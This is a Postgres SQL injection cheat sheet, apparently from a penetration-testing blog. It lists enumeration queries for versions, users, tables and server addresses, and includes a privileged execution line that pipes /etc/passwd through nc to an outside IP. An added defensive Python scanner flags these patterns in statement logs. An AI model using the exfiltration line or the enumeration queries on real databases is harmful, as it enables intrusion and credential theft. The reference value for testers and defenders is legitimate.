Postgres SQL Injection Cheat Sheet
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working on is:

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.
Version
  SELECT version()

Comments
  SELECT 1; --comment
  SELECT /*comment*/1;

  SELECT usename FROM pg_user;
  SELECT getpgusername();

Find Tables From Column Name
  If you want to list all the table names that contain a column LIKE '%password%':
  SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
  WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND
  (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE
  'public') AND attname LIKE '%password%';

Select Nth Row
  SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
  SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Bitwise AND
  SELECT 6 & 2; -- returns 2
  SELECT 6 & 1; -- returns 0

If Statement
  IF statements only seem valid inside functions, so aren't much use for SQL injection.
  See CASE statement instead.

Case Statement
  SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

Make DNS Requests
  Generally not possible in Postgres. However, if contrib/dblink is installed (it isn't by default)
  it can be used to resolve hostnames (assuming you have DBA rights):
  Alternatively, if you have DBA rights you could run an OS-level command (see below) to
  resolve hostnames, e.g. "ping pentestmonkey.net".

Execution
  'system' LANGUAGE 'C' STRICT; -- priv
  SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user

Hostname, IP Address
  SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
  SELECT inet_server_port(); -- returns db server port (or null if using local connection)

Default/System Databases
  template0
  template1
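From the defender's side, here is an added example (not part of the original post) that scans Postgres statement-log lines for the enumeration and privileged patterns tabulated above, first normalising away the comment tricks from the Comments row so they cannot split a signature. The log line format, the sample statements and the category names are assumptions made for the example.

```python
"""Added example (not from the original post): flag logged statements that
match the enumeration and privileged patterns tabulated above."""
import re

# Constructed Postgres statement log (log_statement = 'all'), not a real capture.
SAMPLE_LOG = """\
2024-01-01 10:00:01 UTC [1234] app@shop LOG:  statement: SELECT id, name FROM products WHERE id = 42
2024-01-01 10:00:02 UTC [1234] app@shop LOG:  statement: SELECT /*x*/version()
2024-01-01 10:00:03 UTC [1234] app@shop LOG:  statement: SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows
2024-01-01 10:00:04 UTC [1234] app@shop LOG:  statement: SELECT DISTINCT relname FROM pg_class C, pg_attribute A WHERE attname LIKE '%password%'
2024-01-01 10:00:05 UTC [1234] app@shop LOG:  statement: SELECT inet_server_addr()
2024-01-01 10:00:06 UTC [1234] app@shop LOG:  statement: CREATE OR REPLACE FUNCTION x(cstring) RETURNS int AS '<redacted>' LANGUAGE 'C' STRICT
"""

# One pattern per cheat-sheet row worth alerting on; matched after normalization.
PATTERNS = [
    ("version fingerprint",      r"\bversion\s*\(\s*\)"),
    ("user enumeration",         r"\bpg_user\b|\bgetpgusername\s*\("),
    ("catalog column search",    r"\bpg_attribute\b.*\battname\b"),
    ("server address discovery", r"\binet_server_(addr|port)\s*\("),
    ("C function creation",      r"\bcreate\b.*\bfunction\b.*\blanguage\s+'?c\b"),
    ("dblink use",               r"\bdblink\b"),
]
COMPILED = [(name, re.compile(rx, re.I | re.S)) for name, rx in PATTERNS]
STATEMENT_RE = re.compile(r"LOG:\s+statement:\s*(.*)$")

def normalize(sql):
    """Strip /* */ and -- comments (the Comments row tricks) and collapse
    whitespace. Nested block comments are not handled; enough for a demo."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"--[^\n]*", " ", sql)
    return re.sub(r"\s+", " ", sql).strip()

def classify(statement):
    """Return the cheat-sheet categories a single statement matches."""
    norm = normalize(statement)
    return [name for name, rx in COMPILED if rx.search(norm)]

def scan_log(text):
    """Return (statement, categories) for every logged statement that matches."""
    hits = []
    for line in text.splitlines():
        m = STATEMENT_RE.search(line)
        if m and (cats := classify(m.group(1))):
            hits.append((m.group(1), cats))
    return hits

if __name__ == "__main__":
    for stmt, cats in scan_log(SAMPLE_LOG):
        print(", ".join(cats), "<-", stmt)
```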
Posted in SQL Injection